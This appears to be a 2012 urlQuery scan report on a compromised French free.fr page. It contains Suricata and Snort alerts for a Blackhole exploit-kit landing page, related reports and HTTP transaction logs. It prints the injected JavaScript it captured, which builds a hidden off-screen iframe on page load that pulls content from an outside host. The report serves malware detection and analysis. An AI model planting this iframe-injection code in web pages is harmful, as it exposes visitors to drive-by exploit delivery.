Overview

URL: http://fousolitaire.free.fr/copyright-fr.htm
IP: 212.27.63.109
ASN: AS12322 Free SAS
Location: France
Report completed: 2012-11-06 07:09:35 CET
urlQuery Alerts: Detected malicious iframe injection


Settings

UserAgent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer: (none)
Adobe Reader: 8.0
Java: 1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp | Source IP | Destination IP | Severity | Alert
2012-11-06 07:08:58 | 212.27.63.109 | urlQuery Client | 1 | ET CURRENT_EVENTS c3284d Malware Network Compromised Redirect (comments 2)
2012-11-06 07:08:58 | 212.27.63.109 | urlQuery Client | 1 | ET CURRENT_EVENTS Blackhole Landing Page Eval Variable Obfuscation 3
2012-11-06 07:09:00 | 74.53.143.237 | urlQuery Client | 3 | FILEMAGIC Macromedia Flash data (compressed),
Snort /w Sourcefire VRT
Timestamp | Source IP | Destination IP | Severity | Alert
2012-11-06 07:08:58 | 212.27.63.109 | urlQuery Client | 1 | EXPLOIT-KIT Blackhole landing page with specific structure - prototype catch
2012-11-06 07:08:58 | 212.27.63.109 | urlQuery Client | 1 | EXPLOIT-KIT Blackhole landing page with specific structure - prototype catch


Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 212.27.63.109

Date | Alerts / IDS | URL | IP
2013-03-28 11:27:19 | 2 / 2 | http://78.brice.free.fr/bati.html | 212.27.63.109
2013-03-27 15:50:45 | 2 / 2 | http://78.brice.free.fr/bati.html | 212.27.63.109
2013-03-25 08:51:40 | 1 / 2 | http://mairaeva1.free.fr/spip.php?page=article_magic | 212.27.63.109
2013-03-24 22:05:52 | 1 / 2 | http://mairaeva1.free.fr/spip.php?page=article_magic&id_article=28 | 212.27.63.109
2013-03-24 14:01:27 | 1 / 2 | http://mairaeva1.free.fr/spip.php?page=article_magic | 212.27.63.109
2013-03-23 23:29:44 | 1 / 2 | http://mairaeva1.free.fr/spip.php?page=article_magic&id_article=48 | 212.27.63.109

Last 6 reports on ASN: AS12322 Free SAS

Date | Alerts / IDS | URL | IP
2013-04-03 13:49:17 | 2 / 1 | http://sujet-du-bac.com/recherche.html?searchword=physique | 88.190.14.131
2013-04-03 13:04:00 | 0 / 2 | http://www.pepitotu-home.info/la-douche-non-censuree-de-nabila-amelie-0-66.html | 88.191.120.188
2013-04-03 12:56:12 | 0 / 3 | http://www.banque99shop.info/la-douche-non-censuree-de-nabila-amelie-0-66.html | 88.191.120.188
2013-04-03 11:10:14 | 0 / 2 | http://www.kastorsoft.com/dl/videoDownloaderSDK.exe | 88.190.16.23
2013-04-03 11:05:48 | 0 / 2 | http://neocity1.free.fr/animation_programme/faux_virus/f0024.exe | 212.27.63.115
2013-04-03 11:04:12 | 0 / 2 | http://olravet.free.fr/JardiLune.exe | 212.27.63.102



JavaScript

Executed Scripts (1)


Executed Evals (2)

#1 JavaScript::Eval (size: 291, repeated: 1) - Alert detected on script (Severity: 2)

function frmAdd() {
    var ifrm = document.createElement('iframe');
    ifrm.style.position = 'absolute';
    ifrm.style.top = '-999em';
    ifrm.style.left = '-999em';
    ifrm.src = "http://miamiheattickets.com/http.php";
    ifrm.id = 'frmId';
    document.body.appendChild(ifrm);
};
window.onload = frmAdd;

#2 JavaScript::Eval (size: 3, repeated: 291)

j % 3

Executed Writes (0)



HTTP Transactions (10)


Request Response
GET /copyright-fr.htm HTTP/1.1

Host: fousolitaire.free.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/html
Date: Tue, 06 Nov 2012 06:08:58 GMT
Server: Apache/ProXad [Apr 20 2012 15:06:05]
Last-Modified: Mon, 23 Jul 2012 06:14:12 GMT
Etag: "2cc951-861e-500cebb4"
Connection: close
Accept-Ranges: bytes
Content-Length: 34334
GET /favicon.ico HTTP/1.1

Host: fousolitaire.free.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: image/x-icon
Date: Tue, 06 Nov 2012 06:08:59 GMT
Server: Apache/ProXad [Apr 20 2012 15:06:05]
Last-Modified: Sat, 19 Jan 2008 07:05:34 GMT
Etag: "2c8b25-57e-4791a13e"
Connection: close
Accept-Ranges: bytes
Content-Length: 1406
GET /http.php HTTP/1.1

Host: miamiheattickets.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fousolitaire.free.fr/copyright-fr.htm
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Tue, 06 Nov 2012 06:08:59 GMT
Server: Apache
Last-Modified: Tue, 10 Apr 2012 05:19:44 GMT
Accept-Ranges: bytes
Content-Length: 3354
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
GET /images/x.png HTTP/1.1

Host: 74.53.143.237

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://miamiheattickets.com/http.php
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 06:08:59 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Mon, 12 Jul 2010 18:56:30 GMT
Etag: "e3899de-a70-48b354f7d9380"
Accept-Ranges: bytes
Content-Length: 2672
Connection: close
GET /images/404mid.gif HTTP/1.1

Host: 74.53.143.237

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://miamiheattickets.com/http.php
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 06:08:59 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Mon, 12 Jul 2010 18:56:30 GMT
Etag: "e3899dc-78-48b354f7d9380"
Accept-Ranges: bytes
Content-Length: 120
Connection: close
GET /images/404bottom.gif HTTP/1.1

Host: 74.53.143.237

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://miamiheattickets.com/http.php
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 06:08:59 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Mon, 12 Jul 2010 18:56:30 GMT
Etag: "e3899d8-219-48b354f7d9380"
Accept-Ranges: bytes
Content-Length: 537
Connection: close
GET /images/gatorbottom.png HTTP/1.1

Host: 74.53.143.237

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://miamiheattickets.com/http.php
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 06:08:59 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Wed, 11 May 2011 20:45:00 GMT
Etag: "e3899df-1bae-4a306256eeb00"
Accept-Ranges: bytes
Content-Length: 7086
Connection: close
GET /images/404top.gif HTTP/1.1

Host: 74.53.143.237

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://miamiheattickets.com/http.php
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 06:08:59 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Mon, 12 Jul 2010 18:56:30 GMT
Etag: "e3899dd-5299-48b354f7d9380"
Accept-Ranges: bytes
Content-Length: 21145
Connection: close
GET /images/hg728x90.swf?clickTAG=http://secure.hostgator.com/cgi-bin/affiliates/clickthru.cgi?id=page404 HTTP/1.1

Host: 74.53.143.237

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://miamiheattickets.com/http.php
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Date: Tue, 06 Nov 2012 06:09:00 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Mon, 12 Jul 2010 18:56:30 GMT
Etag: "e3899ca-a95c-48b354f7d9380"
Accept-Ranges: bytes
Content-Length: 43356
Connection: close
GET /get/flashplayer/update/current/xml/version_en_win_pl.xml HTTP/1.1

Host: fpdownload2.macromedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/xml
Server: Apache
Last-Modified: Wed, 03 Oct 2012 19:48:11 GMT
Etag: "289dff-26c-4cb2ceb2654c0"
Accept-Ranges: bytes
Content-Length: 620
Date: Tue, 06 Nov 2012 06:09:01 GMT
Connection: keep-alive